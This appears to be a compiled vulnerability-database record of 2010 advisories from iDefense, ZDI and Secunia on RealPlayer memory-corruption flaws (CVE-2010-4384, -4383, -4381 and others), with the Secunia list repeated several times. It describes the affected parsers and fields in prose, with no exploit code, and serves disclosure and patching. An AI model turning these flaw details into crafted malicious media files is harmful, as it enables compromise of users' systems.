RealPlayer is RealNetworks's media player product used to render video
and other media. For more information, visit http://www.real.com/.
II.
The vulnerability specifically exists in the way RealPlayer handles
specially crafted RealMedia files using RealAudio codec.
III. To exploit this
vulnerability, an attacker must persuade a victim into using RealPlayer
to open a specially crafted media file. This could be accomplished
either by a direct link or by a reference from a website under the
attacker's control. An attacker could host a Web page containing a
malformed file; alternatively, a malicious media file could be attached
to an e-mail message.
IV.
V. WORKAROUND
iDefense is currently unaware of any workaround for this issue.
VI. VENDOR RESPONSE
RealNetworks has released a patch which addresses this issue.
Information about downloadable vendor updates can be found by clicking
on the URLs shown.
http://service.real.com/realplayer/security/12102010_player/en/
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-4387 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
05/12/2010 Initial Contact
05/12/2010 Initial Response
12/10/2010 Coordinated public disclosure
IX.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
VAR-201012-0245 | CVE-2010-4384 | RealNetworks RealPlayer RealMedia Media Properties Header (MDPR) arbitrary code execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Array index error in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code via a malformed Media Properties Header (aka MDPR) in a RealMedia file. The application explicitly trusts an index in this data structure, which it uses to select an object from an array. If an attacker can place controlled data at some point beyond the end of that array, the fabricated object can be invoked, leading to code execution in the context of the current user. Real Networks RealPlayer is prone to a memory-corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer 11.1 and prior, RealPlayer Enterprise 2.1.2 and prior, Mac RealPlayer 11.0.1.949 and prior, and Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ----------------------------------------------------------------------
ZDI-10-268: RealNetworks RealPlayer Media Properties Header Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-268
December 10, 2010
-- CVE ID:
CVE-2010-4384
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6853.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-02-24 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
* Hossein Lotfi
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
VAR-201012-0244 | CVE-2010-4383 | RealNetworks RealPlayer RA5 heap overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 12.0.0.1444, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to have an unspecified impact via a crafted RA5 file. A heap overflow vulnerability exists in the RA5 handling of RealNetworks RealPlayer. Details of the impact of this vulnerability are unknown.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing an MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201012-0242 | CVE-2010-4381 | RealNetworks RealPlayer In AAC Heap overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, and Mac RealPlayer 11.0 through 12.0.0.1444 allows remote attackers to have an unspecified impact via a crafted AAC file. A heap overflow vulnerability exists in the AAC handling of RealNetworks RealPlayer. Details of the impact of this vulnerability are unknown. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format.
VAR-201012-0240 | CVE-2010-4379 | RealNetworks RealPlayer In SIPR Heap overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to have an unspecified impact via a crafted SIPR file. A heap overflow vulnerability exists in the SIPR handling of RealNetworks RealPlayer. Details of the impact of this vulnerability are unknown.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. Remote attackers can use specially crafted SIPR files to cause unspecified effects.
VAR-201012-0224 | CVE-2010-4397 | RealNetworks RealPlayer of pnen3260.dll Module integer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in the pnen3260.dll module in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code via a crafted TIT2 atom in an AAC file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in RealPlayer's pnen3260.dll module while parsing the TIT2 atom within AAC files. The code within this module does not account for a negative size during an allocation and later uses the value as unsigned within a copy loop. Real Networks RealPlayer is prone to an integer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it.
ZDI-10-269: RealNetworks RealPlayer AAC TIT2 Atom Integer Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-269
December 10, 2010
-- CVE ID:
CVE-2010-4397
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8279.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201012-0204 | CVE-2010-2579 | RealNetworks RealPlayer cook codec arbitrary memory access vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 does not properly initialize the number of channels, which allows attackers to obtain unspecified "memory access" via unknown vectors. Real Networks RealPlayer is prone to a memory-access vulnerability. Successful exploits may allow attackers to gain access to sensitive information, cause a denial-of-service condition or memory corruption. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format.
----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
